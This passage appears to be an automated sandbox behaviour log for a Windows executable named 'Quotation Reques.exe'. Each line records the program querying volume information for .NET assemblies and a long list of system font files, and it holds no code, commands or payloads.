          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
